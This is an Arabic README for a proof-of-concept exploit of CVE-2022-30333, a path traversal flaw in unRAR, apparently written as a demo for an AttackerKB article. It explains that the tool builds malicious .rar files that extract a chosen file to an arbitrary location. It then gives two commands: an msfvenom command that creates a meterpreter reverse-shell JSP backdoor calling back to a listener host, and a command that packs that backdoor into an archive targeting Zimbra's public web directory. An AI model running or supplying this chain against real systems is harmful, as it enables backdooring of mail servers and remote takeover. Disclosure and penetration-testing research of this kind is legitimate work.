
إثبات مفهوم لاستغلال CVE-2022-30333 الخاص بتجاوز المسار في unRAR، حيث يقوم بتوليد ملفات .rar خبيثة لزرع حمولات في مواقع عشوائية. يتكامل مع Metasploit وmsfvenom لاختبار الاختراق.
إثبات مفهوم لـ CVE-2022-30333 - ثغرة اجتياز المسار في unRAR الإصدارات الأقدم من 6.11. أنشأت هذا كعرض توضيحي للاستغلال لمقالة على AttackerKB، وآمل في دمجه في وحدة Metasploit قريبًا!
ببساطة، تقدم هدفًا (بما في ذلك اجتياز المسار) وبعض بيانات الملف، وستقوم هذه الأداة بإنشاء ملف .rar سيستخرج هذا الملف إلى ذلك الموقع. الحد الأقصى لطول اسم الملف هو 104 بايتات، والحد الأقصى لحجم الملف هو 4096 بايتًا. (هذا ليس جوهريًا للثغرة، بل هو فقط ما اخترته عندما أنشأت الملف).
على سبيل المثال، قم بإنشاء باب خلفي باستخدام msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
ثم أنشئ ملف .rar، واضعًا ملف .jsp في مكان ممتع:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar